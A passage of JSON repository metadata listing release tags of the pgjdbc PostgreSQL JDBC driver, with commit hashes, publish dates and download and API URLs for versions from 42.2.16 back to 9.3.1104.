eases/tag/REL42.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16/manifests"},{"name":"REL42.2.16-rc2","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T18:15:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2/manifests"},{"name":"REL42.2.16-rc1","sha":"3792f47ebfad1f7c746abcc1f6ed6d0411fbbb0c","kind":"tag","published_at":"2020-08-21T17:04:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1/manifests"},{"name":"REL42.2.15","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-14T18:24:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15/manifests"},{"name":"REL42.2.15-rc2","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-07T15:16:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2/manifests"},{"name":"REL42.2.15-rc1","sha":"6bacf8d4570e8a23e6f57cf3138a68725b4b4ad6","kind":"tag","published_at":"2020-06-19T16:39:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1/manifests"},{"name":"REL42.2.14","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T16:56:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14/manifests"},{"name":"REL42.2.14-rc1","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T14:44:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1/manifests"},{"name":"REL42.2.13","sha":"e63584cfb2bbb904a971a0b19cb4857249e0b8e2","kind":"tag","published_at":"2020-06-04T14:41:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13/manifests"},{"name":"REL42.3.0-rc1","sha":"14b62aca4764d496813f55a43d050b017e01eb65","kind":"tag","published_at":"2020-06-01T13:06:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1/manifests"},{"name":"REL42.2.13-rc1","sha":"ff368032bd539c8b8adac09b7a64d3788281db4d","kind":"tag","published_at":"2020-05-28T13:42:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1/manifests"},{"name":"v42.2.13-rc1","sha":"c6b3cd5468c93068c5b528773ca990b9f0b29a1a","kind":"tag","published_at":"2020-05-27T14:41:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1/manifests"},{"name":"REL42.2.12","sha":"f06c15eac9d517f08bc21913fb20ee47b125d40b","kind":"tag","published_at":"2020-03-31T18:52:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.12","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.12/manifests"},{"name":"REL42.2.11","sha":"2083cf472be3006a01493b8fe42de54eabf9ba07","kind":"tag","published_at":"2020-03-10T15:38:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.11","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.11/manifests"},{"name":"v42.3.0-rc5","sha":"a7d6e00b8281faaf6ff07b06a60d3291763afb8c","kind":"tag","published_at":"2020-03-04T21:09:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc5/manifests"},{"name":"v42.3.0-rc2","sha":"2c1e0ef343050cb880b896abb142b2312d6988a7","kind":"tag","published_at":"2020-03-01T18:39:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc2/manifests"},{"name":"v42.3.0-rc1","sha":"860979fd94d7e87ef33c6535b30eb2e8cd80acdd","kind":"tag","published_at":"2020-03-01T18:19:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.3.0-rc1/manifests"},{"name":"REL42.2.10","sha":"c81913658858c623ebc4582eb703c2d8e21212ee","kind":"tag","published_at":"2020-02-06T18:49:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.10/manifests"},{"name":"REL42.2.9","sha":"29c65312a110b1ed9811930547540ebb34188e15","kind":"tag","published_at":"2019-12-07T14:12:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.9/manifests"},{"name":"REL42.2.8","sha":"33e74f5c2239ea79a9dffb13eb1a3eb8625b3d9a","kind":"tag","published_at":"2019-09-13T17:05:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.8/manifests"},{"name":"REL42.2.7","sha":"443521738ab6ab6bcc4a4a8eaaf632899228dc4d","kind":"tag","published_at":"2019-09-10T12:39:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7/manifests"},{"name":"REL42.2.6","sha":"cf42ba2a804d81a49e91e26c772fbed3d5eb43be","kind":"tag","published_at":"2019-06-19T19:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6/manifests"},{"name":"REL42.2.5","sha":"a1a5ae4f2283d4557f36756d1a0228310a3acccb","kind":"tag","published_at":"2018-08-27T15:38:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5/manifests"},{"name":"REL42.2.4","sha":"b3821baff00a9517f40278b5160a7495fa42a7ad","kind":"tag","published_at":"2018-07-14T13:42:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4/manifests"},{"name":"REL42.2.3","sha":"220c02fce06980733163020634f97cf2d8483f39","kind":"tag","published_at":"2018-07-12T09:44:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3/manifests"},{"name":"REL42.2.2","sha":"c9b1678f519243cb4b044e1bc7cab59070ac1a58","kind":"tag","published_at":"2018-03-15T16:13:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2/manifests"},{"name":"REL42.2.1","sha":"7bb4ebc1c5775a0dca0adf8d760acd5336d355fc","kind":"tag","published_at":"2018-01-25T15:42:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1/manifests"},{"name":"REL42.2.0","sha":"0bbd405590d898a184d5f46331cc803c5a1b22c6","kind":"tag","published_at":"2018-01-17T17:22:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0/manifests"},{"name":"REL42.1.4","sha":"32fb99e7a8a583e057a9f59e8e5bac1571701233","kind":"tag","published_at":"2017-08-01T17:09:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4/manifests"},{"name":"REL42.1.3","sha":"29fe74ee13300811aa05dd233d149763203ef40f","kind":"tag","published_at":"2017-07-14T08:36:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3/manifests"},{"name":"REL42.1.2","sha":"de44a7623a05e2b4d075c84692cda2ab7a208157","kind":"tag","published_at":"2017-07-12T15:23:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2/manifests"},{"name":"REL42.1.1","sha":"2e2ac0d294168d1896a90da470864c12af491a6b","kind":"tag","published_at":"2017-05-05T22:20:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1/manifests"},{"name":"REL42.1.0","sha":"95e06e744ea3b9f4ff7de856d227d64fba32e45e","kind":"tag","published_at":"2017-05-04T21:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0/manifests"},{"name":"REL42.0.0","sha":"e06a13ad8f17d04e98087039b6e346474b20e257","kind":"tag","published_at":"2017-02-18T19:26:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.0.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0/manifests"},{"name":"REL9.4.1212","sha":"4d7a7618adb6c2b3a82a770d84747aeee4b55384","kind":"tag","published_at":"2016-11-02T17:09:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1212","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1212","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1212","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212/manifests"},{"name":"REL9.4.1211","sha":"f808def0c90114f8912135553a77fe3d7625e9db","kind":"tag","published_at":"2016-09-18T13:55:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1211","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1211","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1211","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211/manifests"},{"name":"REL9.4.1210","sha":"b29c95fa924eca19c002b8d21e2e216646c18faa","kind":"tag","published_at":"2016-09-06T20:46:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1210","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1210","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1210","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210/manifests"},{"name":"REL9.4.1209","sha":"51684d9a898e8b6853e04d01b2f99e06e01e55dd","kind":"tag","published_at":"2016-07-15T13:00:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1209","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1209","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1209","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209/manifests"},{"name":"REL9.4.1208","sha":"5b4c6fad736d71f5ed654ac4e2913b006591c8fe","kind":"tag","published_at":"2016-02-19T19:35:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1208","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1208","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1208","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208/manifests"},{"name":"REL9.4.1207","sha":"f17e2f3074a95dc767d6d896ffd696e045b48466","kind":"tag","published_at":"2015-12-22T20:21:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1207","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1207","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1207","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207/manifests"},{"name":"REL9_4_1206","sha":"e0a9b414eab3e1186e9af0450aaa9dfbf096f59e","kind":"commit","published_at":"2015-11-25T20:49:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1206","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1206","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1206","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206/manifests"},{"name":"REL9_4_1205","sha":"fe777e75aa1a8098edc5de44d97895049f4f6518","kind":"commit","published_at":"2015-11-03T15:48:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1205","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1205","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1205","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205/manifests"},{"name":"REL9_3_1104","sha":"de86e79d80ed08580fe0019d0696e9591035902c","kind":"commit","published_at":"2015-10-09T19:11:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1104","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1104